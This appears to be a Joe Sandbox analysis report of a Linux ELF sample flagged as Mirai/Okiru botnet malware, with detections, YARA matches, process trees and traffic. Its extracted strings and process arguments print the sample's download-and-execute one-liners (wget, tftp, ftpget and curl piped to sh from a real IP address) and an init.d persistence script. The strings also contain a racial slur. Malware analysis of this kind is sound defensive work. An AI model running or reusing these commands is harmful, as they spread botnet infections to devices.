Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:x86_32.nn.elf
Analysis ID:1574229
MD5:b6c87b436d8de600e1f8c7978a098739
SHA1:610ffdd17efa2412f76de225cc4b33102653b85d
SHA256:8b1aeae909258c79a17d2d0590cf857ec7713c2c5ec0e0995d9294b60e6d3e8b
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1574229
Start date and time:2024-12-13 06:12:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_32.nn.elf
Detection:MAL
Classification:mal96.spre.troj.evad.linELF@0/9@0/0
  • VT rate limit hit for: /etc/init.d/sh
Command:/tmp/x86_32.nn.elf
PID:6238
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_32.nn.elf (PID: 6238, Parent: 6162, MD5: b6c87b436d8de600e1f8c7978a098739) Arguments: /tmp/x86_32.nn.elf
    • sh (PID: 6253, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6260, Parent: 6253)
      • systemctl (PID: 6260, Parent: 6253, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6286, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6287, Parent: 6286)
      • chmod (PID: 6287, Parent: 6286, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6288, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6289, Parent: 6288)
      • ln (PID: 6289, Parent: 6288, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6290, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 6291, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 6292, Parent: 6291)
      • chmod (PID: 6292, Parent: 6291, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 6293, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6294, Parent: 6293)
      • mkdir (PID: 6294, Parent: 6293, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6295, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 6296, Parent: 6295)
      • ln (PID: 6296, Parent: 6295, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 6245, Parent: 799)
  • dumpe2fs (PID: 6245, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6271, Parent: 6269)
  • snapd-env-generator (PID: 6271, Parent: 6269, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6310, Parent: 799)
  • dumpe2fs (PID: 6310, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6396, Parent: 799)
  • dumpe2fs (PID: 6396, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6416, Parent: 799)
  • dumpe2fs (PID: 6416, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6418, Parent: 799)
  • dumpe2fs (PID: 6418, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86_32.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_32.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86_32.nn.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      x86_32.nn.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      x86_32.nn.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      6308.1.0000000008048000.000000000805f000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6308.1.0000000008048000.000000000805f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6308.1.0000000008048000.000000000805f000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
          • 0x1193b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
          6308.1.0000000008048000.000000000805f000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
          • 0x4978:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          • 0x4c4b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          • 0x5605:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          6308.1.0000000008048000.000000000805f000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x5700:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          Click to see the 39 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86_32.nn.elfVirustotal: Detection: 39%Perma Link
          Source: x86_32.nn.elfReversingLabs: Detection: 44%
          Source: x86_32.nn.elfJoe Sandbox ML: detected
          Source: x86_32.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
          Source: x86_32.nn.elfString: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"
          Source: global trafficTCP traffic: 192.168.2.23:60408 -> 94.156.227.234:38242
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 119.101.53.7
          Source: unknownTCP traffic detected without corresponding DNS query: 132.64.26.6
          Source: unknownTCP traffic detected without corresponding DNS query: 58.57.46.142
          Source: unknownTCP traffic detected without corresponding DNS query: 96.47.236.159
          Source: unknownTCP traffic detected without corresponding DNS query: 8.215.225.213
          Source: unknownTCP traffic detected without corresponding DNS query: 8.123.43.188
          Source: unknownTCP traffic detected without corresponding DNS query: 73.208.8.14
          Source: unknownTCP traffic detected without corresponding DNS query: 207.140.221.139
          Source: unknownTCP traffic detected without corresponding DNS query: 58.204.40.109
          Source: unknownTCP traffic detected without corresponding DNS query: 204.39.7.11
          Source: unknownTCP traffic detected without corresponding DNS query: 213.165.171.116
          Source: unknownTCP traffic detected without corresponding DNS query: 217.191.134.17
          Source: unknownTCP traffic detected without corresponding DNS query: 45.9.249.72
          Source: unknownTCP traffic detected without corresponding DNS query: 17.45.30.32
          Source: unknownTCP traffic detected without corresponding DNS query: 20.24.177.207
          Source: unknownTCP traffic detected without corresponding DNS query: 100.220.11.149
          Source: unknownTCP traffic detected without corresponding DNS query: 106.3.16.100
          Source: unknownTCP traffic detected without corresponding DNS query: 134.188.53.245
          Source: unknownTCP traffic detected without corresponding DNS query: 58.19.3.91
          Source: unknownTCP traffic detected without corresponding DNS query: 194.245.186.15
          Source: unknownTCP traffic detected without corresponding DNS query: 140.69.243.183
          Source: unknownTCP traffic detected without corresponding DNS query: 159.4.36.240
          Source: unknownTCP traffic detected without corresponding DNS query: 77.150.89.131
          Source: unknownTCP traffic detected without corresponding DNS query: 4.112.207.233
          Source: unknownTCP traffic detected without corresponding DNS query: 33.39.83.190
          Source: unknownTCP traffic detected without corresponding DNS query: 59.2.73.34
          Source: unknownTCP traffic detected without corresponding DNS query: 56.228.134.107
          Source: unknownTCP traffic detected without corresponding DNS query: 107.241.159.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.155.83.6
          Source: unknownTCP traffic detected without corresponding DNS query: 206.223.123.139
          Source: unknownTCP traffic detected without corresponding DNS query: 150.58.162.200
          Source: unknownTCP traffic detected without corresponding DNS query: 206.152.178.138
          Source: unknownTCP traffic detected without corresponding DNS query: 79.25.150.5
          Source: unknownTCP traffic detected without corresponding DNS query: 20.115.118.134
          Source: unknownTCP traffic detected without corresponding DNS query: 124.189.196.216
          Source: unknownTCP traffic detected without corresponding DNS query: 84.2.132.46
          Source: unknownTCP traffic detected without corresponding DNS query: 9.187.47.127
          Source: unknownTCP traffic detected without corresponding DNS query: 77.131.27.25
          Source: unknownTCP traffic detected without corresponding DNS query: 14.75.121.138
          Source: unknownTCP traffic detected without corresponding DNS query: 22.216.227.222
          Source: unknownTCP traffic detected without corresponding DNS query: 148.26.181.224
          Source: unknownTCP traffic detected without corresponding DNS query: 24.135.206.9
          Source: unknownTCP traffic detected without corresponding DNS query: 64.199.0.103
          Source: unknownTCP traffic detected without corresponding DNS query: 118.203.182.154
          Source: unknownTCP traffic detected without corresponding DNS query: 220.235.63.126
          Source: unknownTCP traffic detected without corresponding DNS query: 76.76.23.185
          Source: unknownTCP traffic detected without corresponding DNS query: 48.14.166.231
          Source: unknownTCP traffic detected without corresponding DNS query: 191.228.69.4
          Source: unknownTCP traffic detected without corresponding DNS query: 132.173.130.115
          Source: x86_32.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
          Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
          Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
          Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
          Source: Initial sampleString containing 'busybox' found: usage: busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
          Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
          Source: Initial sampleString containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: /tmp/x86_32.nn.elf (PID: 6308)SIGKILL sent: pid: 6297, result: successfulJump to behavior
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
